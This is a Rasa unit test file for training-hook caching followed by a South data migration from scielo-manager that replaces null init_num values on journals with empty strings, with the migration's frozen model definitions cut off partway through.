2022-02-01T18:23:23.000Z
|
2022-02-01T18:23:23.000Z
|
from rasa.engine.caching import TrainingCache
from rasa.engine.graph import ExecutionContext, GraphNode, GraphSchema, SchemaNode
from rasa.engine.storage.storage import ModelStorage
from rasa.engine.training import fingerprinting
from rasa.engine.training.components import PrecomputedValueProvider
from rasa.engine.training.hooks import TrainingHook
from tests.engine.graph_components_test_classes import (
CacheableComponent,
CacheableText,
)
def test_training_hook_saves_to_cache(
default_model_storage: ModelStorage,
temp_cache: TrainingCache,
default_training_hook: TrainingHook,
):
# We need an execution context so the hook can determine the class of the graph
# component
execution_context = ExecutionContext(
GraphSchema(
{
"hello": SchemaNode(
needs={},
constructor_name="create",
fn="run",
config={},
uses=CacheableComponent,
)
}
),
"1",
)
node = GraphNode(
node_name="hello",
component_class=CacheableComponent,
constructor_name="create",
component_config={},
fn_name="run",
inputs={"suffix": "input_node"},
eager=False,
model_storage=default_model_storage,
resource=None,
execution_context=execution_context,
hooks=[default_training_hook],
)
node(("input_node", "Joe"))
# This is the same key that the hook will generate
fingerprint_key = fingerprinting.calculate_fingerprint_key(
graph_component_class=CacheableComponent,
config={"prefix": "Hello "},
inputs={"suffix": "Joe"},
)
output_fingerprint_key = temp_cache.get_cached_output_fingerprint(fingerprint_key)
assert output_fingerprint_key
cached_result = temp_cache.get_cached_result(
output_fingerprint_key=output_fingerprint_key,
model_storage=default_model_storage,
node_name="hello",
)
assert isinstance(cached_result, CacheableText)
assert cached_result.text == "Hello Joe"
def test_training_hook_does_not_cache_cached_component(
default_model_storage: ModelStorage,
temp_cache: TrainingCache,
default_training_hook: TrainingHook,
):
# We need an execution context so the hook can determine the class of the graph
# component
execution_context = ExecutionContext(
GraphSchema(
{
"hello": SchemaNode(
needs={},
constructor_name="create",
fn="run",
config={},
uses=PrecomputedValueProvider,
)
}
),
"1",
)
node = GraphNode(
node_name="hello",
component_class=PrecomputedValueProvider,
constructor_name="create",
component_config={"output": CacheableText("hi")},
fn_name="get_value",
inputs={},
eager=False,
model_storage=default_model_storage,
resource=None,
execution_context=execution_context,
hooks=[default_training_hook],
)
node(("input_node", "Joe"))
# This is the same key that the hook will generate
fingerprint_key = fingerprinting.calculate_fingerprint_key(
graph_component_class=PrecomputedValueProvider,
config={"output": CacheableText("hi")},
inputs={},
)
# The hook should not cache the output of a PrecomputedValueProvider
assert not temp_cache.get_cached_output_fingerprint(fingerprint_key)
| 31.643478
| 86
| 0.646057
|
f3d24b8fb4d8bc05bb6392f1c03891faa2043558
| 33,508
|
py
|
Python
|
scielomanager/journalmanager/migrations/0016_fix_nulls_in_init_num.py
|
patymori/scielo-manager
|
0945f377376de8ef0ada83c35b4e2312062cdf45
|
[
"BSD-2-Clause"
] | 8
|
2015-07-07T03:09:16.000Z
|
2019-03-16T04:46:32.000Z
|
scielomanager/journalmanager/migrations/0016_fix_nulls_in_init_num.py
|
DalavanCloud/scielo-manager
|
0945f377376de8ef0ada83c35b4e2312062cdf45
|
[
"BSD-2-Clause"
] | 245
|
2015-01-14T13:29:58.000Z
|
2022-01-13T00:48:44.000Z
|
scielomanager/journalmanager/migrations/0016_fix_nulls_in_init_num.py
|
DalavanCloud/scielo-manager
|
0945f377376de8ef0ada83c35b4e2312062cdf45
|
[
"BSD-2-Clause"
] | 5
|
2016-02-19T15:47:08.000Z
|
2019-03-16T04:46:20.000Z
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Don't use "from appname.models import ModelName".
# Use orm.ModelName to refer to models in this application,
# and orm['appname.ModelName'] for models in other applications.
orm.Journal.objects.filter(init_num=None).update(init_num='')
def backwards(self, orm):
"Write your backwards methods here."
orm.Journal.objects.filter(init_num='').update(init_num=None)
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'journalmanager.aheadpressrelease': {
'Meta': {'object_name': 'AheadPressRelease', '_ormbases': ['journalmanager.PressRelease']},
'journal': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'press_releases'", 'to': "orm['journalmanager.Journal']"}),
'pressrelease_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['journalmanager.PressRelease']", 'unique': 'True', 'primary_key': 'True'})
},
'journalmanager.article': {
'Meta': {'object_name': 'Article'},
'aid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'article_type': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'articles_linkage_is_pending': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
'doi': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '2048', 'db_index': 'True'}),
'domain_key': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '2048', 'db_index': 'False'}),
'es_is_dirty': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'es_updated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_aop': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'issn_epub': ('django.db.models.fields.CharField', [], {'max_length': '9', 'db_index': 'True'}),
'issn_ppub': ('django.db.models.fields.CharField', [], {'max_length': '9', 'db_index': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'articles'", 'null': 'True', 'to': "orm['journalmanager.Issue']"}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'articles'", 'null': 'True', 'to': "orm['journalmanager.Journal']"}),
'journal_title': ('django.db.models.fields.CharField', [], {'max_length': '512', 'db_index': 'True'}),
'related_articles': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['journalmanager.Article']", 'null': 'True', 'through': "orm['journalmanager.ArticlesLinkage']", 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'xml': ('scielomanager.custom_fields.XMLSPSField', [], {}),
'xml_version': ('django.db.models.fields.CharField', [], {'max_length': '9'})
},
'journalmanager.articleslinkage': {
'Meta': {'object_name': 'ArticlesLinkage'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link_to': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'referrers'", 'to': "orm['journalmanager.Article']"}),
'link_type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'referrer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'links_to'", 'to': "orm['journalmanager.Article']"})
},
'journalmanager.collection': {
'Meta': {'ordering': "['name']", 'object_name': 'Collection'},
'acronym': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '16', 'blank': 'True'}),
'address': ('django.db.models.fields.TextField', [], {}),
'address_complement': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'address_number': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'collection': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'user_collection'", 'to': "orm['auth.User']", 'through': "orm['journalmanager.UserCollections']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'name_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'zip_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'})
},
'journalmanager.institution': {
'Meta': {'ordering': "['name']", 'object_name': 'Institution'},
'acronym': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '16', 'blank': 'True'}),
'address': ('django.db.models.fields.TextField', [], {}),
'address_complement': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'address_number': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'cel': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'complement': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_trashed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'db_index': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'zip_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'})
},
'journalmanager.issue': {
'Meta': {'ordering': "('created', 'id')", 'object_name': 'Issue'},
'cover': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'ctrl_vocabulary': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'editorial_standard': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_marked_up': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_trashed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Journal']"}),
'label': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '64', 'null': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'blank': 'True'}),
'publication_end_month': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'publication_start_month': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'publication_year': ('django.db.models.fields.IntegerField', [], {}),
'section': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['journalmanager.Section']", 'symmetrical': 'False', 'blank': 'True'}),
'spe_text': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'suppl_text': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'total_documents': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'regular'", 'max_length': '15'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'use_license': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.UseLicense']", 'null': 'True'}),
'volume': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'})
},
'journalmanager.issuetitle': {
'Meta': {'object_name': 'IssueTitle'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Issue']"}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Language']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'journalmanager.journal': {
'Meta': {'ordering': "('title', 'id')", 'object_name': 'Journal'},
'abstract_keyword_languages': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'abstract_keyword_languages'", 'symmetrical': 'False', 'to': "orm['journalmanager.Language']"}),
'acronym': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'ccn_code': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64', 'blank': 'True'}),
'collections': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['journalmanager.Collection']", 'through': "orm['journalmanager.Membership']", 'symmetrical': 'False'}),
'copyrighter': ('django.db.models.fields.CharField', [], {'max_length': '254'}),
'cover': ('scielomanager.custom_fields.ContentTypeRestrictedFileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'enjoy_creator'", 'to': "orm['auth.User']"}),
'ctrl_vocabulary': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'current_ahead_documents': ('django.db.models.fields.IntegerField', [], {'default': '0', 'max_length': '3', 'null': 'True', 'blank': 'True'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'editor_journal'", 'null': 'True', 'to': "orm['auth.User']"}),
'editor_address': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'editor_address_city': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'editor_address_country': ('scielo_extensions.modelfields.CountryField', [], {'max_length': '2'}),
'editor_address_state': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'editor_address_zip': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'editor_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'editor_name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'editor_phone1': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'editor_phone2': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'editorial_standard': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'eletronic_issn': ('django.db.models.fields.CharField', [], {'max_length': '9', 'db_index': 'True'}),
'final_num': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'final_vol': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'final_year': ('django.db.models.fields.CharField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'}),
'frequency': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index_coverage': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'init_num': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'init_vol': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'init_year': ('django.db.models.fields.CharField', [], {'max_length': '4'}),
'is_indexed_aehci': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_indexed_scie': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_indexed_ssci': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_trashed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'languages': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['journalmanager.Language']", 'symmetrical': 'False'}),
'logo': ('scielomanager.custom_fields.ContentTypeRestrictedFileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'medline_code': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'medline_title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'other_previous_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'previous_ahead_documents': ('django.db.models.fields.IntegerField', [], {'default': '0', 'max_length': '3', 'null': 'True', 'blank': 'True'}),
'previous_title': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'prev_title'", 'null': 'True', 'to': "orm['journalmanager.Journal']"}),
'print_issn': ('django.db.models.fields.CharField', [], {'max_length': '9', 'db_index': 'True'}),
'pub_level': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'publication_city': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'publisher_country': ('scielo_extensions.modelfields.CountryField', [], {'max_length': '2'}),
'publisher_name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'publisher_state': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'scielo_issn': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'secs_code': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'short_title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'db_index': 'True'}),
'sponsor': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'journal_sponsor'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['journalmanager.Sponsor']"}),
'study_areas': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'journals_migration_tmp'", 'null': 'True', 'to': "orm['journalmanager.StudyArea']"}),
'subject_categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'journals'", 'null': 'True', 'to': "orm['journalmanager.SubjectCategory']"}),
'subject_descriptors': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'db_index': 'True'}),
'title_iso': ('django.db.models.fields.CharField', [], {'max_length': '256', 'db_index': 'True'}),
'twitter_user': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url_journal': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'url_online_submission': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'use_license': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.UseLicense']"})
},
'journalmanager.journalmission': {
'Meta': {'object_name': 'JournalMission'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'missions'", 'to': "orm['journalmanager.Journal']"}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Language']", 'null': 'True'})
},
'journalmanager.journaltimeline': {
'Meta': {'object_name': 'JournalTimeline'},
'collection': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Collection']"}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'statuses'", 'to': "orm['journalmanager.Journal']"}),
'reason': ('django.db.models.fields.TextField', [], {'default': "''"}),
'since': ('django.db.models.fields.DateTimeField', [], {}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '16'})
},
'journalmanager.journaltitle': {
'Meta': {'object_name': 'JournalTitle'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'other_titles'", 'to': "orm['journalmanager.Journal']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'journalmanager.language': {
'Meta': {'ordering': "['name']", 'object_name': 'Language'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'iso_code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'journalmanager.membership': {
'Meta': {'unique_together': "(('journal', 'collection'),)", 'object_name': 'Membership'},
'collection': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Collection']"}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Journal']"}),
'reason': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'since': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'inprogress'", 'max_length': '16'})
},
'journalmanager.pendedform': {
'Meta': {'object_name': 'PendedForm'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'form_hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pending_forms'", 'to': "orm['auth.User']"}),
'view_name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'journalmanager.pendedvalue': {
'Meta': {'object_name': 'PendedValue'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'data'", 'to': "orm['journalmanager.PendedForm']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'journalmanager.pressrelease': {
'Meta': {'object_name': 'PressRelease'},
'doi': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'journalmanager.pressreleasearticle': {
'Meta': {'object_name': 'PressReleaseArticle'},
'article_pid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'press_release': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'articles'", 'to': "orm['journalmanager.PressRelease']"})
},
'journalmanager.pressreleasetranslation': {
'Meta': {'object_name': 'PressReleaseTranslation'},
'content': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Language']"}),
'press_release': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'translations'", 'to': "orm['journalmanager.PressRelease']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'journalmanager.regularpressrelease': {
'Meta': {'object_name': 'RegularPressRelease', '_ormbases': ['journalmanager.PressRelease']},
'issue': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'press_releases'", 'to': "orm['journalmanager.Issue']"}),
'pressrelease_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['journalmanager.PressRelease']", 'unique': 'True', 'primary_key': 'True'})
},
'journalmanager.section': {
'Meta': {'ordering': "('id',)", 'object_name': 'Section'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '21', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_trashed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Journal']"}),
'legacy_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'journalmanager.sectiontitle': {
'Meta': {'ordering': "['title']", 'object_name': 'SectionTitle'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Language']"}),
'section': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'titles'", 'to': "orm['journalmanager.Section']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'journalmanager.sponsor': {
'Meta': {'ordering': "['name']", 'object_name': 'Sponsor', '_ormbases': ['journalmanager.Institution']},
'collections': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['journalmanager.Collection']", 'symmetrical': 'False'}),
'institution_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['journalmanager.Institution']", 'unique': 'True', 'primary_key': 'True'})
},
'journalmanager.studyarea': {
'Meta': {'object_name': 'StudyArea'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'study_area': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'journalmanager.subjectcategory': {
'Meta': {'object_name': 'SubjectCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '256', 'db_index': 'True'})
},
'journalmanager.translateddata': {
'Meta': {'object_name': 'TranslatedData'},
'field': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'translation': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'})
},
'journalmanager.uselicense': {
'Meta': {'ordering': "['license_code']", 'object_name': 'UseLicense'},
'disclaimer': ('django.db.models.fields.TextField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'license_code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'reference_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'journalmanager.usercollections': {
'Meta': {'unique_together': "(('user', 'collection'),)", 'object_name': 'UserCollections'},
'collection': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['journalmanager.Collection']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_manager': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'journalmanager.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'email_notifications': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
